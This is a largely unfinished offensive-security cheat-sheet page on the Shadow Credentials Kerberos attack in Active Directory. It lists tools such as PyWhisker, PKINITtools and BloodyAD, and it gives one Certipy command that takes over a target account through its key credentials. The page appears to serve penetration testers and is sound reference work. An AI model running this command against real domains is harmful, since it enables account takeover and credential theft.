SHADOW CREDENTIALS

PRIMARY CATEGORY → KERBEROS

Theory

🛠️⌛

---

Abuse - UNIX-like

🛠️⌛

Certipy

Certipy

A

certipy shadow auto -dc-ip '<DC_IP>' -username '<USER>' -password '<PASSWD>' -account '<TARGET_ACCOUNT>'

PyWhisker + PKINITtools

Usage

A

PyWhisker

B

PKINITtools

PtC

C

PKINITtools

UtH

BloodyAD

BloodyAD

A

B?